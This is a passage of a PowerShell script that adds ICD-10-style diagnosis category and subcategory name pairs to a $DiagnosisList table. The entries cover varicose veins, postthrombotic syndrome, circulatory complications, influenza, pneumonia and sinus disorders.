$null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer of other part of lower extremity and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of right lower extremity with both ulcer and inflammation","Varicose veins of right lower extremity with both ulcer of unspecified site and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer of thigh and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer of calf and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer of ankle and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer of heel and midfoot and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer other part of foot and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer of other part of lower extremity and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of left lower extremity with both ulcer and inflammation","Varicose veins of left lower extremity with both ulcer of unspecified site and inflammation") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with pain","Varicose veins of right lower extremity with pain") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with pain","Varicose veins of left lower extremity with pain") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with pain","Varicose veins of bilateral lower extremities with pain") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with pain","Varicose veins of unspecified lower extremity with pain") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with other complications","Varicose veins of right lower extremity with other complications") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with other complications","Varicose veins of left lower extremity with other complications") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with other complications","Varicose veins of bilateral lower extremities with other complications") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremities with other complications","Varicose veins of unspecified lower extremity with other complications") + $null = $DiagnosisList.Rows.Add("Asymptomatic varicose veins of lower extremities","Asymptomatic varicose veins of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Asymptomatic varicose veins of lower extremities","Asymptomatic varicose veins of right lower extremity") + $null = $DiagnosisList.Rows.Add("Asymptomatic varicose veins of lower extremities","Asymptomatic varicose veins of left lower extremity") + $null = $DiagnosisList.Rows.Add("Asymptomatic varicose veins of lower extremities","Asymptomatic varicose veins of bilateral lower extremities") + $null = $DiagnosisList.Rows.Add("Esophageal varices","Esophageal varices without bleeding") + $null = $DiagnosisList.Rows.Add("Esophageal varices","Esophageal varices with bleeding") + $null = $DiagnosisList.Rows.Add("Secondary esophageal varices","Secondary esophageal varices without bleeding") + $null = $DiagnosisList.Rows.Add("Secondary esophageal varices","Secondary esophageal varices with bleeding") + $null = $DiagnosisList.Rows.Add("Varicose veins of other sites","Sublingual varices") + $null = $DiagnosisList.Rows.Add("Varicose veins of other sites","Scrotal varices") + $null = $DiagnosisList.Rows.Add("Varicose veins of other sites","Pelvic varices") + $null = $DiagnosisList.Rows.Add("Varicose veins of other sites","Vulval varices") + $null = $DiagnosisList.Rows.Add("Varicose veins of other sites","Gastric varices") + $null = $DiagnosisList.Rows.Add("Varicose veins of other sites","Varicose veins of other specified sites") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome without complications","Postthrombotic syndrome without complications of right lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome without complications","Postthrombotic syndrome without complications of left lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome without complications","Postthrombotic syndrome without complications of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome without complications","Postthrombotic syndrome without complications of unspecified extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer","Postthrombotic syndrome with ulcer of right lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer","Postthrombotic syndrome with ulcer of left lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer","Postthrombotic syndrome with ulcer of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer","Postthrombotic syndrome with ulcer of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with inflammation","Postthrombotic syndrome with inflammation of right lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with inflammation","Postthrombotic syndrome with inflammation of left lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with inflammation","Postthrombotic syndrome with inflammation of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with inflammation","Postthrombotic syndrome with inflammation of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer and inflammation","Postthrombotic syndrome with ulcer and inflammation of right lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer and inflammation","Postthrombotic syndrome with ulcer and inflammation of left lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer and inflammation","Postthrombotic syndrome with ulcer and inflammation of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with ulcer and inflammation","Postthrombotic syndrome with ulcer and inflammation of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with other complications","Postthrombotic syndrome with other complications of right lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with other complications","Postthrombotic syndrome with other complications of left lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with other complications","Postthrombotic syndrome with other complications of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Postthrombotic syndrome with other complications","Postthrombotic syndrome with other complications of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Compression of vein","Compression of vein") + $null = $DiagnosisList.Rows.Add("Venous insufficiency (chronic) (peripheral)","Venous insufficiency (chronic) (peripheral)") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) without complications","Chronic venous hypertension (idiopathic) without complications of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) without complications","Chronic venous hypertension (idiopathic) without complications of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) without complications","Chronic venous hypertension (idiopathic) without complications of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) without complications","Chronic venous hypertension (idiopathic) without complications of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer","Chronic venous hypertension (idiopathic) with ulcer of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer","Chronic venous hypertension (idiopathic) with ulcer of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer","Chronic venous hypertension (idiopathic) with ulcer of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer","Chronic venous hypertension (idiopathic) with ulcer of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with inflammation","Chronic venous hypertension (idiopathic) with inflammation of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with inflammation","Chronic venous hypertension (idiopathic) with inflammation of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with inflammation","Chronic venous hypertension (idiopathic) with inflammation of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with inflammation","Chronic venous hypertension (idiopathic) with inflammation of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer and inflammation","Chronic venous hypertension (idiopathic) with ulcer and inflammation of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer and inflammation","Chronic venous hypertension (idiopathic) with ulcer and inflammation of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer and inflammation","Chronic venous hypertension (idiopathic) with ulcer and inflammation of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with ulcer and inflammation","Chronic venous hypertension (idiopathic) with ulcer and inflammation of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with other complications","Chronic venous hypertension (idiopathic) with other complications of right lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with other complications","Chronic venous hypertension (idiopathic) with other complications of left lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with other complications","Chronic venous hypertension (idiopathic) with other complications of bilateral lower extremity") + $null = $DiagnosisList.Rows.Add("Chronic venous hypertension (idiopathic) with other complications","Chronic venous hypertension (idiopathic) with other complications of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Other specified disorders of veins","Other specified disorders of veins") + $null = $DiagnosisList.Rows.Add("Disorder of vein, unspecified","Disorder of vein, unspecified") + $null = $DiagnosisList.Rows.Add("Nonspecific lymphadenitis","Nonspecific mesenteric lymphadenitis") + $null = $DiagnosisList.Rows.Add("Nonspecific lymphadenitis","Chronic lymphadenitis, except mesenteric") + $null = $DiagnosisList.Rows.Add("Nonspecific lymphadenitis","Other nonspecific lymphadenitis") + $null = $DiagnosisList.Rows.Add("Nonspecific lymphadenitis","Nonspecific lymphadenitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of lymphatic vessels and lymph nodes","Lymphedema, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of lymphatic vessels and lymph nodes","Lymphangitis") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of lymphatic vessels and lymph nodes","Other specified noninfective disorders of lymphatic vessels and lymph nodes") + $null = $DiagnosisList.Rows.Add("Other noninfective disorders of lymphatic vessels and lymph nodes","Noninfective disorder of lymphatic vessels and lymph nodes, unspecified") + $null = $DiagnosisList.Rows.Add("Hypotension","Idiopathic hypotension") + $null = $DiagnosisList.Rows.Add("Hypotension","Orthostatic hypotension") + $null = $DiagnosisList.Rows.Add("Hypotension","Hypotension due to drugs") + $null = $DiagnosisList.Rows.Add("Hypotension","Hypotension of hemodialysis") + $null = $DiagnosisList.Rows.Add("Other hypotension","Postprocedural hypotension") + $null = $DiagnosisList.Rows.Add("Other hypotension","Other hypotension") + $null = $DiagnosisList.Rows.Add("Hypotension, unspecified","Hypotension, unspecified") + $null = $DiagnosisList.Rows.Add("Gangrene, not elsewhere classified","Gangrene, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of circulatory system, not elsewhere classified","Postcardiotomy syndrome") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiac insufficiency","Postprocedural cardiac insufficiency following cardiac surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiac insufficiency","Postprocedural cardiac insufficiency following other surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiac arrest","Postprocedural cardiac arrest following cardiac surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiac arrest","Postprocedural cardiac arrest following other surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural heart failure","Postprocedural heart failure following cardiac surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural heart failure","Postprocedural heart failure following other surgery") + $null = $DiagnosisList.Rows.Add("Other postprocedural cardiac functional disturbances","Other postprocedural cardiac functional disturbances following cardiac surgery") + $null = $DiagnosisList.Rows.Add("Other postprocedural cardiac functional disturbances","Other postprocedural cardiac functional disturbances following other surgery") + $null = $DiagnosisList.Rows.Add("Postmastectomy lymphedema syndrome","Postmastectomy lymphedema syndrome") + $null = $DiagnosisList.Rows.Add("Postprocedural hypertension","Postprocedural hypertension") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating a circulatory system procedure","Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating a cardiac catheterization") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating a circulatory system procedure","Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating a cardiac bypass") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating a circulatory system procedure","Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating other circulatory system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating other procedure","Intraoperative hemorrhage and hematoma of a circulatory system organ or structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a circulatory system organ or structure during a procedure","Accidental puncture and laceration of a circulatory system organ or structure during a circulatory system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a circulatory system organ or structure during a procedure","Accidental puncture and laceration of a circulatory system organ or structure during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a circulatory system organ or structure following a circulatory system procedure","Postprocedural hemorrhage of a circulatory system organ or structure following a cardiac catheterization") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a circulatory system organ or structure following a circulatory system procedure","Postprocedural hemorrhage of a circulatory system organ or structure following cardiac bypass") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a circulatory system organ or structure following a circulatory system procedure","Postprocedural hemorrhage of a circulatory system organ or structure following other circulatory system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage, hematoma and seroma of a circulatory system organ or structure following other procedure","Postprocedural hemorrhage of a circulatory system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage, hematoma and seroma of a circulatory system organ or structure following other procedure","Postprocedural hematoma of a circulatory system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage, hematoma and seroma of a circulatory system organ or structure following other procedure","Postprocedural seroma of a circulatory system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of a circulatory system organ or structure following a circulatory system procedure","Postprocedural hematoma of a circulatory system organ or structure following a cardiac catheterization") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of a circulatory system organ or structure following a circulatory system procedure","Postprocedural hematoma of a circulatory system organ or structure following cardiac bypass") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma of a circulatory system organ or structure following a circulatory system procedure","Postprocedural hematoma of a circulatory system organ or structure following other circulatory system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of a circulatory system organ or structure following a circulatory system procedure","Postprocedural seroma of a circulatory system organ or structure following a cardiac catheterization") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of a circulatory system organ or structure following a circulatory system procedure","Postprocedural seroma of a circulatory system organ or structure following cardiac bypass") + $null = $DiagnosisList.Rows.Add("Postprocedural seroma of a circulatory system organ or structure following a circulatory system procedure","Postprocedural seroma of a circulatory system organ or structure following other circulatory system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative cardiac arrest","Intraoperative cardiac arrest during cardiac surgery") + $null = $DiagnosisList.Rows.Add("Intraoperative cardiac arrest","Intraoperative cardiac arrest during other surgery") + $null = $DiagnosisList.Rows.Add("Other intraoperative cardiac functional disturbances","Other intraoperative cardiac functional disturbances during cardiac surgery") + $null = $DiagnosisList.Rows.Add("Other intraoperative cardiac functional disturbances","Other intraoperative cardiac functional disturbances during other surgery") + $null = $DiagnosisList.Rows.Add("Intraoperative cerebrovascular infarction","Intraoperative cerebrovascular infarction during cardiac surgery") + $null = $DiagnosisList.Rows.Add("Intraoperative cerebrovascular infarction","Intraoperative cerebrovascular infarction during other surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural cerebrovascular infarction","Postprocedural cerebrovascular infarction following cardiac surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural cerebrovascular infarction","Postprocedural cerebrovascular infarction following other surgery") + $null = $DiagnosisList.Rows.Add("Other intraoperative complications of the circulatory system, not elsewhere classified","Other intraoperative complications of the circulatory system, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other postprocedural complications and disorders of the circulatory system, not elsewhere classified","Other postprocedural complications and disorders of the circulatory system, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of circulatory system","Other disorder of circulatory system") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of circulatory system","Unspecified disorder of circulatory system") + $null = $DiagnosisList.Rows.Add("Acute nasopharyngitis [common cold]","Acute nasopharyngitis [common cold]") + $null = $DiagnosisList.Rows.Add("Acute maxillary sinusitis","Acute maxillary sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute maxillary sinusitis","Acute recurrent maxillary sinusitis") + $null = $DiagnosisList.Rows.Add("Acute frontal sinusitis","Acute frontal sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute frontal sinusitis","Acute recurrent frontal sinusitis") + $null = $DiagnosisList.Rows.Add("Acute ethmoidal sinusitis","Acute ethmoidal sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute ethmoidal sinusitis","Acute recurrent ethmoidal sinusitis") + $null = $DiagnosisList.Rows.Add("Acute sphenoidal sinusitis","Acute sphenoidal sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute sphenoidal sinusitis","Acute recurrent sphenoidal sinusitis") + $null = $DiagnosisList.Rows.Add("Acute pansinusitis","Acute pansinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute pansinusitis","Acute recurrent pansinusitis") + $null = $DiagnosisList.Rows.Add("Other acute sinusitis","Other acute sinusitis") + $null = $DiagnosisList.Rows.Add("Other acute sinusitis","Other acute recurrent sinusitis") + $null = $DiagnosisList.Rows.Add("Acute sinusitis, unspecified","Acute sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute sinusitis, unspecified","Acute recurrent sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute pharyngitis","Streptococcal pharyngitis") + $null = $DiagnosisList.Rows.Add("Acute pharyngitis","Acute pharyngitis due to other specified organisms") + $null = $DiagnosisList.Rows.Add("Acute pharyngitis","Acute pharyngitis, unspecified") + $null = $DiagnosisList.Rows.Add("Streptococcal tonsillitis","Acute streptococcal tonsillitis, unspecified") + $null = $DiagnosisList.Rows.Add("Streptococcal tonsillitis","Acute recurrent streptococcal tonsillitis") + $null = $DiagnosisList.Rows.Add("Acute tonsillitis due to other specified organisms","Acute tonsillitis due to other specified organisms") + $null = $DiagnosisList.Rows.Add("Acute tonsillitis due to other specified organisms","Acute recurrent tonsillitis due to other specified organisms") + $null = $DiagnosisList.Rows.Add("Acute tonsillitis, unspecified","Acute tonsillitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute tonsillitis, unspecified","Acute recurrent tonsillitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute laryngitis and tracheitis","Acute laryngitis") + $null = $DiagnosisList.Rows.Add("Acute tracheitis","Acute tracheitis without obstruction") + $null = $DiagnosisList.Rows.Add("Acute tracheitis","Acute tracheitis with obstruction") + $null = $DiagnosisList.Rows.Add("Acute laryngotracheitis","Acute laryngotracheitis") + $null = $DiagnosisList.Rows.Add("Supraglottitis, unspecified","Supraglottitis, unspecified, without obstruction") + $null = $DiagnosisList.Rows.Add("Supraglottitis, unspecified","Supraglottitis, unspecified, with obstruction") + $null = $DiagnosisList.Rows.Add("Acute obstructive laryngitis [croup] and epiglottitis","Acute obstructive laryngitis [croup]") + $null = $DiagnosisList.Rows.Add("Acute epiglottitis","Acute epiglottitis without obstruction") + $null = $DiagnosisList.Rows.Add("Acute epiglottitis","Acute epiglottitis with obstruction") + $null = $DiagnosisList.Rows.Add("Acute upper respiratory infections of multiple and unspecified sites","Acute laryngopharyngitis") + $null = $DiagnosisList.Rows.Add("Acute upper respiratory infections of multiple and unspecified sites","Acute upper respiratory infection, unspecified") + $null = $DiagnosisList.Rows.Add("Influenza due to identified novel influenza A virus","Influenza due to identified novel influenza A virus with pneumonia") + $null = $DiagnosisList.Rows.Add("Influenza due to identified novel influenza A virus","Influenza due to identified novel influenza A virus with other respiratory manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to identified novel influenza A virus","Influenza due to identified novel influenza A virus with gastrointestinal manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to identified novel influenza A virus","Influenza due to identified novel influenza A virus with other manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with pneumonia","Influenza due to other identified influenza virus with unspecified type of pneumonia") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with pneumonia","Influenza due to other identified influenza virus with the same other identified influenza virus pneumonia") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with pneumonia","Influenza due to other identified influenza virus with other specified pneumonia") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with other respiratory manifestations","Influenza due to other identified influenza virus with other respiratory manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with gastrointestinal manifestations","Influenza due to other identified influenza virus with gastrointestinal manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with other manifestations","Influenza due to other identified influenza virus with encephalopathy") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with other manifestations","Influenza due to other identified influenza virus with myocarditis") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with other manifestations","Influenza due to other identified influenza virus with otitis media") + $null = $DiagnosisList.Rows.Add("Influenza due to other identified influenza virus with other manifestations","Influenza due to other identified influenza virus with other manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with pneumonia","Influenza due to unidentified influenza virus with unspecified type of pneumonia") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with pneumonia","Influenza due to unidentified influenza virus with specified pneumonia") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with other respiratory manifestations","Influenza due to unidentified influenza virus with other respiratory manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with gastrointestinal manifestations","Influenza due to unidentified influenza virus with gastrointestinal manifestations") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with other manifestations","Influenza due to unidentified influenza virus with encephalopathy") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with other manifestations","Influenza due to unidentified influenza virus with myocarditis") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with other manifestations","Influenza due to unidentified influenza virus with otitis media") + $null = $DiagnosisList.Rows.Add("Influenza due to unidentified influenza virus with other manifestations","Influenza due to unidentified influenza virus with other manifestations") + $null = $DiagnosisList.Rows.Add("Viral pneumonia, not elsewhere classified","Adenoviral pneumonia") + $null = $DiagnosisList.Rows.Add("Viral pneumonia, not elsewhere classified","Respiratory syncytial virus pneumonia") + $null = $DiagnosisList.Rows.Add("Viral pneumonia, not elsewhere classified","Parainfluenza virus pneumonia") + $null = $DiagnosisList.Rows.Add("Viral pneumonia, not elsewhere classified","Human metapneumovirus pneumonia") + $null = $DiagnosisList.Rows.Add("Other viral pneumonia","Pneumonia due to SARS-associated coronavirus") + $null = $DiagnosisList.Rows.Add("Other viral pneumonia","Other viral pneumonia") + $null = $DiagnosisList.Rows.Add("Viral pneumonia, unspecified","Viral pneumonia, unspecified") + $null = $DiagnosisList.Rows.Add("Pneumonia due to Streptococcus pneumoniae","Pneumonia due to Streptococcus pneumoniae") + $null = $DiagnosisList.Rows.Add("Pneumonia due to Hemophilus influenzae","Pneumonia due to Hemophilus influenzae") + $null = $DiagnosisList.Rows.Add("Bacterial pneumonia, not elsewhere classified","Pneumonia due to Klebsiella pneumoniae") + $null = $DiagnosisList.Rows.Add("Bacterial pneumonia, not elsewhere classified","Pneumonia due to Pseudomonas") + $null = $DiagnosisList.Rows.Add("Pneumonia due to staphylococcus","Pneumonia due to staphylococcus, unspecified") + $null = $DiagnosisList.Rows.Add("Pneumonia due to staphylococcus aureus","Pneumonia due to Methicillin susceptible Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Pneumonia due to staphylococcus aureus","Pneumonia due to Methicillin resistant Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Pneumonia due to other staphylococcus","Pneumonia due to other staphylococcus") + $null = $DiagnosisList.Rows.Add("Pneumonia due to streptococcus, group B","Pneumonia due to streptococcus, group B") + $null = $DiagnosisList.Rows.Add("Pneumonia due to other streptococci","Pneumonia due to other streptococci") + $null = $DiagnosisList.Rows.Add("Pneumonia due to Escherichia coli","Pneumonia due to Escherichia coli") + $null = $DiagnosisList.Rows.Add("Pneumonia due to other Gram-negative bacteria","Pneumonia due to other Gram-negative bacteria") + $null = $DiagnosisList.Rows.Add("Pneumonia due to Mycoplasma pneumoniae","Pneumonia due to Mycoplasma pneumoniae") + $null = $DiagnosisList.Rows.Add("Pneumonia due to other specified bacteria","Pneumonia due to other specified bacteria") + $null = $DiagnosisList.Rows.Add("Unspecified bacterial pneumonia","Unspecified bacterial pneumonia") + $null = $DiagnosisList.Rows.Add("Pneumonia due to other infectious organisms, not elsewhere classified","Chlamydial pneumonia") + $null = $DiagnosisList.Rows.Add("Pneumonia due to other infectious organisms, not elsewhere classified","Pneumonia due to other specified infectious organisms") + $null = $DiagnosisList.Rows.Add("Pneumonia in diseases classified elsewhere","Pneumonia in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Pneumonia, unspecified organism","Bronchopneumonia, unspecified organism") + $null = $DiagnosisList.Rows.Add("Pneumonia, unspecified organism","Lobar pneumonia, unspecified organism") + $null = $DiagnosisList.Rows.Add("Pneumonia, unspecified organism","Hypostatic pneumonia, unspecified organism") + $null = $DiagnosisList.Rows.Add("Pneumonia, unspecified organism","Other pneumonia, unspecified organism") + $null = $DiagnosisList.Rows.Add("Pneumonia, unspecified organism","Pneumonia, unspecified organism") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to Mycoplasma pneumoniae") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to Hemophilus influenzae") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to streptococcus") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to coxsackievirus") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to parainfluenza virus") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to respiratory syncytial virus") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to rhinovirus") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to echovirus") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis due to other specified organisms") + $null = $DiagnosisList.Rows.Add("Acute bronchitis","Acute bronchitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute bronchiolitis","Acute bronchiolitis due to respiratory syncytial virus") + $null = $DiagnosisList.Rows.Add("Acute bronchiolitis","Acute bronchiolitis due to human metapneumovirus") + $null = $DiagnosisList.Rows.Add("Acute bronchiolitis","Acute bronchiolitis due to other specified organisms") + $null = $DiagnosisList.Rows.Add("Acute bronchiolitis","Acute bronchiolitis, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified acute lower respiratory infection","Unspecified acute lower respiratory infection") + $null = $DiagnosisList.Rows.Add("Vasomotor and allergic rhinitis","Vasomotor rhinitis") + $null = $DiagnosisList.Rows.Add("Vasomotor and allergic rhinitis","Allergic rhinitis due to pollen") + $null = $DiagnosisList.Rows.Add("Vasomotor and allergic rhinitis","Other seasonal allergic rhinitis") + $null = $DiagnosisList.Rows.Add("Vasomotor and allergic rhinitis","Allergic rhinitis due to food") + $null = $DiagnosisList.Rows.Add("Other allergic rhinitis","Allergic rhinitis due to animal (cat) (dog) hair and dander") + $null = $DiagnosisList.Rows.Add("Other allergic rhinitis","Other allergic rhinitis") + $null = $DiagnosisList.Rows.Add("Allergic rhinitis, unspecified","Allergic rhinitis, unspecified") + $null = $DiagnosisList.Rows.Add("Chronic rhinitis, nasopharyngitis and pharyngitis","Chronic rhinitis") + $null = $DiagnosisList.Rows.Add("Chronic rhinitis, nasopharyngitis and pharyngitis","Chronic nasopharyngitis") + $null = $DiagnosisList.Rows.Add("Chronic rhinitis, nasopharyngitis and pharyngitis","Chronic pharyngitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Chronic maxillary sinusitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Chronic frontal sinusitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Chronic ethmoidal sinusitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Chronic sphenoidal sinusitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Chronic pansinusitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Other chronic sinusitis") + $null = $DiagnosisList.Rows.Add("Chronic sinusitis","Chronic sinusitis, unspecified") + $null = $DiagnosisList.Rows.Add("Nasal polyp","Polyp of nasal cavity") + $null = $DiagnosisList.Rows.Add("Nasal polyp","Polypoid sinus degeneration") + $null = $DiagnosisList.Rows.Add("Nasal polyp","Other polyp of sinus") + $null = $DiagnosisList.Rows.Add("Nasal polyp","Nasal polyp, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of nose and nasal sinuses","Abscess, furuncle and 